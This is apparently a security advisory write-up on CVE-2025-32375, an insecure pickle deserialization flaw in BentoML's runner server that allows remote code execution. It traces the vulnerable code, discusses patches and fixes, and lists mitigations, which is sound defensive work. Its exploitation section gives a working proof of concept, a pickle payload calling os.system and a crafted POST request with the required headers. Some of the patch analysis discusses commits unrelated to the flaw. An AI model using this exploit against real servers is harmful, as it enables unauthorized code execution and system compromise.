CVE-2025-32375: Insecure Deserialization in BentoML Runner Server Leads to RCE
Executive Summary
CVE-2025-32375 describes a critical vulnerability in BentoML's runner server, stemming from insecure deserialization. By crafting a malicious POST request with specific headers, an attacker can achieve Remote Code Execution (RCE) on the server. This allows unauthorized arbitrary code execution, potentially leading to initial access, information disclosure, and complete system compromise. The vulnerability arises from the unsafe use of `pickle.loads()` on attacker-controlled data.
Technical Details
Affected Systems:
- BentoML runner server
Affected Software Versions:
- All versions prior to the fix.
Affected Components:
src/bentoml/_internal/server/runner_app.py
src/bentoml/_internal/runner/container.py
src/bentoml/_internal/runner/utils.py
The vulnerability lies within the request handling logic of the BentoML runner server. Specifically, the `_deserialize_single_param` function in `src/bentoml/_internal/server/runner_app.py` processes request headers such as `Payload-Container`, `Payload-Meta`, and `Batch-Size`, combining them with the request body to construct a `Payload` object. This `Payload` is then passed through a series of functions, ultimately leading to the execution of `pickle.loads()` on the data contained in the request body.
Root Cause Analysis
The root cause of CVE-2025-32375 is the insecure use of Python's `pickle.loads()` function. `pickle` is a powerful serialization library, but it is inherently unsafe when used to deserialize data from untrusted sources, because a malicious pickle stream can contain arbitrary code that is executed during the deserialization process.
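The danger is easy to demonstrate: `pickle.loads()` invokes whatever callable an object's `__reduce__` method names, before any application code ever sees the data. A minimal, harmless illustration (not BentoML code):

```python
import pickle

class Demo:
    """Object whose __reduce__ tells pickle to call a function on load."""
    def __reduce__(self):
        # pickle will call str.upper("executed during loads") while deserializing
        return (str.upper, ("executed during loads",))

blob = pickle.dumps(Demo())
# Deserializing the blob runs the callable -- no method of Demo is ever called
result = pickle.loads(blob)
print(result)  # EXECUTED DURING LOADS
```

Replace `str.upper` with `os.system` and the same mechanism yields arbitrary command execution, which is exactly what the exploit below does.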
The vulnerability occurs because the `Payload-Container` header determines which class's `from_payload` method is called. When `Payload-Container` is set to `NdarrayContainer` or `PandasDataFrameContainer`, and `payload.meta["format"]` is set to `"default"`, `pickle.loads(payload.data)` is invoked. `payload.data` is derived directly from the request body, which is controlled by the attacker.
Here's a breakdown of the vulnerable code paths:
- Request Handling: The `_request_handler` function in `src/bentoml/_internal/server/runner_app.py` is responsible for handling incoming requests.

  ```python
  # src/bentoml/_internal/server/runner_app.py#L291-L298
  async def _request_handler(request: Request) -> Response:
      assert self._is_ready

      arg_num = int(request.headers["args-number"])
      r_: bytes = await request.body()
      if arg_num == 1:
          params: Params[t.Any] = _deserialize_single_param(request, r_)
  ```
- Deserialization: The `_deserialize_single_param` function extracts header values and the request body to create a `Payload` object.

  ```python
  # src/bentoml/_internal/server/runner_app.py#L376-L393
  def _deserialize_single_param(request: Request, bs: bytes) -> Params[t.Any]:
      container = request.headers["Payload-Container"]
      meta = json.loads(request.headers["Payload-Meta"])
      batch_size = int(request.headers["Batch-Size"])
      kwarg_name = request.headers.get("Kwarg-Name")
      payload = Payload(
          data=bs,
          meta=meta,
          batch_size=batch_size,
          container=container,
      )
      if kwarg_name:
          d = {kwarg_name: payload}
          params: Params[t.Any] = Params(**d)
      else:
          params: Params[t.Any] = Params(payload)

      return params
  ```
- Inference: The `infer` function then processes the `params` object.

  ```python
  # src/bentoml/_internal/server/runner_app.py#L303-L304
  try:
      payload = await infer(params)
  ```
- Payload Mapping: Inside `infer`, the `params` object's `map` function is called with `AutoContainer.from_payload`.

  ```python
  # src/bentoml/_internal/server/runner_app.py#L278-L289
  async def infer(params: Params[t.Any]) -> Payload:
      params = params.map(AutoContainer.from_payload)
      try:
          ret = await runner_method.async_run(
              *params.args, **params.kwargs
          )
      except Exception:
          traceback.print_exc()
          raise
      return AutoContainer.to_payload(ret, 0)
  ```
- Container Selection: `AutoContainer.from_payload` determines the container class based on the `Payload-Container` header.

  ```python
  # src/bentoml/_internal/runner/container.py#L710-L712
  def from_payload(cls, payload: Payload) -> t.Any:
      container_cls = DataContainerRegistry.find_by_name(payload.container)
      return container_cls.from_payload(payload)
  ```
- Unsafe Deserialization: Finally, the `from_payload` methods of `NdarrayContainer` and `PandasDataFrameContainer` call `pickle.loads()` if the `"format"` key in `payload.meta` is set to `"default"`.

  ```python
  # src/bentoml/_internal/runner/container.py#L411-L416
  def from_payload(
      cls,
      payload: Payload,
  ) -> ext.PdDataFrame:
      if payload.meta["format"] == "default":
          return pickle.loads(payload.data)
  ```

  ```python
  # src/bentoml/_internal/runner/container.py#L306-L312
  def from_payload(
      cls,
      payload: Payload,
  ) -> ext.NpNDArray:
      format = payload.meta.get("format", "default")
      if format == "default":
          return pickle.loads(payload.data)
  ```
This direct deserialization of attacker-controlled data without proper sanitization is the core vulnerability.
Patch Analysis
Multiple patches were applied to address the vulnerability and improve the BentoML framework. Here's an analysis of the relevant patches:
- feat: implement bento arguments (#5299)

  This patch introduces the ability to override values of the Image from `bentofile.yaml` and implements bento arguments. While it does not directly address the insecure deserialization, it adds a new feature that could be misused if not handled carefully.

  File: `src/_bentoml_impl/server/serving.py`

  ```diff
  --- a/src/_bentoml_impl/server/serving.py
  +++ b/src/_bentoml_impl/server/serving.py
  @@ -92,6 +92,7 @@ def _get_server_socket(
   _SERVICE_WORKER_SCRIPT = "_bentoml_impl.worker.service"
   
  +@inject
   def create_dependency_watcher(
       bento_identifier: str,
       svc: AnyService,
  @@ -101,6 +102,7 @@ def create_dependency_watcher(
       scheduler: ResourceAllocator,
       working_dir: str | None = None,
       env: dict[str, str] | None = None,
  +    bento_args: dict[str, t.Any] = Provide[BentoMLContainer.bento_arguments],
   ) -> tuple[Watcher, CircusSocket, str]:
       from bentoml.serving import create_watcher
   
  @@ -116,6 +118,8 @@ def create_dependency_watcher(
           f"$(circus.sockets.{svc.name})",
           "--worker-id",
           "$(CIRCUS.WID)",
  +        "--args",
  +        json.dumps(bento_args),
       ]
   
       if worker_envs:
  @@ -306,6 +310,7 @@ def serve_http(
           timeout_graceful_shutdown=timeout_graceful_shutdown,
       )
       timeout_args = ["--timeout", str(timeout)] if timeout else []
  +    bento_args = BentoMLContainer.bento_arguments.get()
   
       server_args = [
           "-m",
  @@ -319,6 +324,8 @@ def serve_http(
           str(backlog),
           "--worker-id",
           "$(CIRCUS.WID)",
  +        "--args",
  +        json.dumps(bento_args),
           *ssl_args,
           *timeouts_args,
           *timeout_args,
  ```

  This code introduces the concept of `bento_args`, arguments passed to the BentoML service. They are serialized as JSON and passed to the worker processes. While JSON serialization is generally safer than pickle, these arguments should still be validated and sanitized to prevent other classes of vulnerability. The `@inject` decorator and `Provide[BentoMLContainer.bento_arguments]` indicate that the arguments are managed by the dependency-injection system, allowing flexible configuration and overriding of values.
- fix: remove start commands from CLI (#5303)

  This patch removes the `start` commands from the CLI and redirects them to internal modules, simplifying the CLI and improving the internal structure of BentoML.

  File: `src/bentoml/_internal/container/frontend/dockerfile/entrypoint.sh`

  ```diff
  --- a/src/bentoml/_internal/container/frontend/dockerfile/entrypoint.sh
  +++ b/src/bentoml/_internal/container/frontend/dockerfile/entrypoint.sh
  @@ -18,36 +18,39 @@ _main() {
     # For backwards compatibility with the yatai<1.0.0, adapting the old "yatai" command to the new "start" command.
     if [ "${#}" -gt 0 ] && [ "${1}" = 'python' ] && [ "${2}" = '-m' ] && { [ "${3}" = 'bentoml._internal.server.cli.runner' ] || [ "${3}" = "bentoml._internal.server.cli.api_server" ]; }; then # SC2235, use { } to avoid subshell overhead
       if [ "${3}" = 'bentoml._internal.server.cli.runner' ]; then
  -      set -- bentoml start-runner-server "${@:4}"
  +      set -- python -m bentoml_cli._internal.start start-runner-server "${@:4}"
       elif [ "${3}" = 'bentoml._internal.server.cli.api_server' ]; then
  -      set -- bentoml start-http-server "${@:4}"
  +      set -- python -m bentoml_cli._internal.start start-http-server "${@:4}"
       fi
  +  # Redirect start-* commands to the internal modules.
  +  elif [ "${#}" -gt 0 ] && { [ "${1}" = 'start-http-server' ] || [ "${1}" = 'start-grpc-server' ] || [ "${1}" = 'start-runner-server' ]; }; then
  +    set -- python -m bentoml_cli._internal.start "${@:1}" "$BENTO_PATH"
     # If no arg or first arg looks like a flag.
     elif [[ "$#" -eq 0 ]] || [[ "${1:0:1}" =~ '-' ]]; then
       # This is provided for backwards compatibility with places where user may have
       # discover this easter egg and use it in their scripts to run the container.
       if [[ -v BENTOML_SERVE_COMPONENT ]]; then
         echo "\$BENTOML_SERVE_COMPONENT is set! Calling 'bentoml start-*' instead"
         if [ "${BENTOML_SERVE_COMPONENT}" = 'http_server' ]; then
  -        set -- bentoml start-http-server "$@" "$BENTO_PATH"
  +        set -- python -m bentoml_cli._internal.start start-http-server "$@" "$BENTO_PATH"
         elif [ "${BENTOML_SERVE_COMPONENT}" = 'grpc_server' ]; then
  -        set -- bentoml start-grpc-server "$@" "$BENTO_PATH"
  +        set -- python -m bentoml_cli._internal.start start-grpc-server "$@" "$BENTO_PATH"
         elif [ "${BENTOML_SERVE_COMPONENT}" = 'runner' ]; then
  -        set -- bentoml start-runner-server "$@" "$BENTO_PATH"
  +        set -- python -m bentoml_cli._internal.start start-runner-server "$@" "$BENTO_PATH"
         fi
       else
         set -- bentoml serve "$@" "$BENTO_PATH"
       fi
     fi
     # Override the BENTOML_PORT if PORT env var is present. Used for Heroku and Yatai.
     if [[ -v PORT ]]; then
       echo "\$PORT is set! Overriding \$BENTOML_PORT with \$PORT ($PORT)"
       export BENTOML_PORT=$PORT
     fi
     # Handle serve and start commands that is passed to the container.
     # Assuming that serve and start commands are the first arguments
     # Note that this is the recommended way going forward to run all bentoml containers.
  -  if [ "${#}" -gt 0 ] && { [ "${1}" = 'serve' ] || [ "${1}" = 'serve-http' ] || [ "${1}" = 'serve-grpc' ] || [ "${1}" = 'start-http-server' ] || [ "${1}" = 'start-grpc-server' ] || [ "${1}" = 'start-runner-server' ]; }; then
  +  if [ "${#}" -gt 0 ] && { [ "${1}" = 'serve' ] || [ "${1}" = 'serve-http' ] || [ "${1}" = 'serve-grpc' ]; }; then
       exec bentoml "$@" "$BENTO_PATH"
     else
       # otherwise default to run whatever the command is
  ```

  This patch does not directly address the insecure deserialization vulnerability, but it changes how the server is started, which affects the attack surface: by redirecting the `start-*` commands to internal modules, the entry points for exploitation change and may be reduced.
- feat: make it possible to override values of Image from bentofile.yaml (#5298)

  This patch allows overriding values of the Image from `bentofile.yaml`. It introduces more flexibility in configuring the BentoML environment but also requires careful validation to prevent malicious configurations.

  File: `src/_bentoml_sdk/images.py`

  ```diff
  --- a/src/_bentoml_sdk/images.py
  +++ b/src/_bentoml_sdk/images.py
  @@ -41,7 +41,8 @@
   class Image:
       """A class defining the environment requirements for bento."""
   
  -    base_image: str
  +    base_image: str = ""
  +    distro: str = "debian"
       python_version: str = DEFAULT_PYTHON_VERSION
       commands: t.List[str] = attrs.field(factory=list)
       lock_python_packages: bool = True
  @@ -243,7 +274,11 @@ def _freeze_python_requirements(
               cwd=bento_fs.getsyspath(py_folder),
           )
       except subprocess.CalledProcessError as e:
  -        raise BentoMLException(f"Failed to lock PyPI packages: {e}") from None
  +        raise BentoMLException(
  +            "Failed to lock PyPI packages. Add `--debug` option to see more details.\n"
  +            "You see this error because you set `lock_packages=true` in the image config.\n"
  +            "Learn more at https://docs.bentoml.com/en/latest/reference/bentoml/bento-build-options.html#pypi-package-locking"
  +        ) from e
       locked_requirements = (  # uv doesn't preserve global option lines, add them here
           "\n".join(option.dumps() for option in requirements_file.options)
       )
  ```

  This patch modifies the `Image` class to allow setting the base image and distro. It also updates the error message shown when locking PyPI packages fails, giving the user more information. While these changes do not directly address the insecure deserialization, they improve the configurability of BentoML and its error reporting.
Theoretical Fixes:
Given the root cause, the primary fix would involve removing or replacing the insecure `pickle.loads()` call. Here are a few potential strategies:
- Use a Safe Serialization Format: Replace `pickle` with a safer serialization format such as JSON or Protocol Buffers. This would require changing the `Content-Type` header and the corresponding deserialization logic.
- Input Validation and Sanitization: If `pickle` is necessary for some reason, implement strict input validation and sanitization. This could involve whitelisting allowed classes or data structures and rejecting any input that does not conform to the expected format.
- Sandboxing: Execute the `pickle.loads()` call within a sandboxed environment with limited privileges, so that an attacker cannot gain full control of the system even if they manage to execute code.
- Authentication and Authorization: Implement robust authentication and authorization mechanisms so that only trusted users can send requests to the runner server.
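The whitelisting strategy can be sketched using the `pickle.Unpickler.find_class` override documented in the Python standard library: any global not on an explicit allowlist is rejected before it can be resolved. This is a minimal illustration, not BentoML code, and the allowlist contents are hypothetical:

```python
import io
import pickle

# Hypothetical allowlist: only these (module, name) pairs may be resolved.
_ALLOWED = {
    ("builtins", "list"),
    ("builtins", "dict"),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Refuse to resolve any global outside the allowlist, blocking
        # gadgets such as os.system reached via __reduce__.
        if (module, name) not in _ALLOWED:
            raise pickle.UnpicklingError(f"forbidden global: {module}.{name}")
        return super().find_class(module, name)

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

# Plain data deserializes fine...
print(restricted_loads(pickle.dumps([1, 2, 3])))  # [1, 2, 3]

# ...but a __reduce__ gadget targeting os.system is rejected.
class Evil:
    def __reduce__(self):
        import os
        return (os.system, ("echo pwned",))

try:
    restricted_loads(pickle.dumps(Evil()))
except pickle.UnpicklingError as e:
    print("blocked:", e)
```

Even with such a restriction, the Python documentation cautions that pickle is not designed to be secure against malicious data, so a format change (strategy 1) remains the stronger fix.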
A theoretical patch to `src/bentoml/_internal/runner/container.py` might look like this:

```diff
--- a/src/bentoml/_internal/runner/container.py
+++ b/src/bentoml/_internal/runner/container.py
@@ -303,10 +303,13 @@
     cls,
     payload: Payload,
 ) -> ext.NpNDArray:
-    format = payload.meta.get("format", "default")
-    if format == "default":
-        return pickle.loads(payload.data)
+    if payload.meta.get("format") == "default":
+        # Replace pickle.loads with a safer alternative, e.g., JSON
+        try:
+            import json
+            return json.loads(payload.data.decode('utf-8'))
+        except json.JSONDecodeError:
+            raise ValueError("Invalid JSON data")
+    else:
+        raise ValueError("Unsupported format")
```

This theoretical patch replaces `pickle.loads` with `json.loads`, requiring the client to send JSON-encoded data instead of pickled data. It also adds error handling for invalid JSON data and unsupported formats. This mitigates the RCE vulnerability by preventing the execution of arbitrary code during deserialization.
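Under such a JSON-based fix, a client would send JSON text instead of a pickle stream. A minimal sketch of the round trip (the wire format here is an assumption for illustration, not the actual patch):

```python
import json

# Client side: serialize a 2x2 matrix as JSON bytes instead of pickle.
matrix = [[1.0, 2.0], [3.0, 4.0]]
body = json.dumps(matrix).encode("utf-8")

# Server side (per the theoretical patch): parse the JSON body safely.
restored = json.loads(body.decode("utf-8"))
print(restored)  # [[1.0, 2.0], [3.0, 4.0]]
```

A real `NdarrayContainer` fix would additionally need to rebuild the array (e.g., with `numpy.asarray(restored)`) and carry the dtype and shape metadata that pickle previously preserved.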
Exploitation Techniques
An attacker can exploit CVE-2025-32375 by sending a crafted POST request to the BentoML runner server. The request must include the following headers:
- `args-number: 1`
- `Content-Type: application/vnd.bentoml.pickled`
- `Payload-Container: NdarrayContainer` (or `PandasDataFrameContainer`)
- `Payload-Meta: {"format": "default"}`
- `Batch-Size: -1`
The request body should contain a malicious pickle payload that executes arbitrary code.
Here's a step-by-step Proof of Concept (PoC) example:
- Create a malicious pickle payload:

  ```python
  import pickle
  import base64

  class RCE:
      def __reduce__(self):
          import os
          return (os.system, ('touch /tmp/pwned',))  # Replace with your desired command

  payload = pickle.dumps(RCE())
  payload_b64 = base64.b64encode(payload).decode()
  print(f"Pickle Payload (Base64 Encoded): {payload_b64}")
  ```

  This code creates a Python class `RCE` with a `__reduce__` method that executes the `touch /tmp/pwned` command. The `pickle.dumps()` function serializes this class into a pickle payload, and `base64.b64encode()` encodes it in Base64 for easier transmission.
- Send the crafted POST request:

  ```python
  import pickle

  import requests

  url = "http://0.0.0.0:8888/"

  # Create the malicious pickle payload (same as above)
  class RCE:
      def __reduce__(self):
          import os
          return (os.system, ('touch /tmp/pwned',))  # Replace with your desired command

  payload = pickle.dumps(RCE())

  headers = {
      "args-number": "1",
      "Content-Type": "application/vnd.bentoml.pickled",
      "Payload-Container": "NdarrayContainer",
      "Payload-Meta": '{"format": "default"}',
      "Batch-Size": "-1",
  }

  response = requests.post(url, headers=headers, data=payload)
  print(response.status_code)
  print(response.content)
  ```

  This code sends a POST request to the BentoML runner server with the crafted headers and the malicious pickle payload in the request body. If the exploit succeeds, the `touch /tmp/pwned` command is executed on the server, creating a file named `/tmp/pwned`.
Attack Scenarios:
- Remote Code Execution: An attacker can execute arbitrary code on the server, potentially gaining full control of the system.
- Information Disclosure: An attacker can access sensitive data stored on the server, such as API keys, database credentials, and customer data.
- Denial of Service: An attacker can crash the server by sending a malicious pickle payload that causes an exception.
- Lateral Movement: If the server is part of a larger network, an attacker can use it as a stepping stone to gain access to other systems.
Real-World Impacts:
- Compromised Machine Learning Models: An attacker could modify or replace machine learning models, leading to incorrect predictions or biased results.
- Data Breach: An attacker could steal sensitive data used by the machine learning models, such as customer data or financial information.
- Supply Chain Attacks: An attacker could inject malicious code into the BentoML deployment pipeline, compromising the entire machine learning supply chain.
Mitigation Strategies
To mitigate CVE-2025-32375, the following strategies are recommended:
- Upgrade to the latest version of BentoML: Upgrade to a version of BentoML that includes a fix for this vulnerability.
- Disable or Replace Pickle Deserialization: If possible, disable or replace the use of `pickle.loads()` in the runner server; use a safer serialization format such as JSON or Protocol Buffers instead.
- Input Validation: Implement strict input validation to ensure that only trusted data is deserialized. Whitelist allowed classes or data structures and reject any input that does not conform to the expected format.
- Network Segmentation: Isolate the BentoML runner server from other systems on the network to limit the impact of a successful attack.
- Least Privilege: Run the BentoML runner server with the least privileges necessary, limiting what an attacker can do on the system.
- Web Application Firewall (WAF): Deploy a WAF to filter out malicious requests before they reach the BentoML runner server. The WAF can be configured to block requests with suspicious headers or payloads.
- Regular Security Audits: Conduct regular security audits of the BentoML deployment to identify and address vulnerabilities.
- Monitor for Suspicious Activity: Implement monitoring and alerting to detect suspicious activity on the BentoML runner server, such as unusual network traffic, unexpected process execution, or unauthorized access attempts.
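For the WAF and monitoring items above, a cheap heuristic is to flag request bodies that look like pickle streams by their leading bytes. This is a sketch, not BentoML or WAF-vendor code, and it assumes legitimate clients do not send pickled payloads:

```python
import pickle

def looks_like_pickle(body: bytes) -> bool:
    """Heuristic pickle detector: protocol 2+ pickle streams begin with the
    PROTO opcode (0x80) followed by the protocol number. Protocol 0/1
    streams lack this header, so this is a heuristic, not a guarantee."""
    return len(body) >= 2 and body[0] == 0x80 and 2 <= body[1] <= 5

print(looks_like_pickle(pickle.dumps({"a": 1})))   # True
print(looks_like_pickle(b'{"format": "json"}'))    # False
```

Such a rule would be deployed alongside, not instead of, the upgrade: it raises the bar for casual exploitation but a determined attacker can still craft protocol 0/1 streams that evade it.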
Configuration Changes:
- If using a custom `bentofile.yaml`, ensure that the `image` configuration does not allow arbitrary base images or distros.
- Review and restrict the use of BentoML arguments to prevent malicious configurations.
Security Best Practices:
- Follow the principle of least privilege when configuring the BentoML environment.
- Keep all software components up to date with the latest security patches.
- Implement strong authentication and authorization mechanisms.
- Regularly review and update security policies and procedures.
Timeline of Discovery and Disclosure
- Public Disclosure: CVE-2025-32375 was publicly disclosed.
References
- NVD: (NVD entry will be available after public disclosure)
- GitHub Advisory: https://github.com/bentoml/BentoML/security/advisories/GHSA-7v4r-c989-xh26
- GitHub Global Advisory: https://github.com/advisories/GHSA-7v4r-c989-xh26
- BentoML Repository: https://github.com/bentoml/BentoML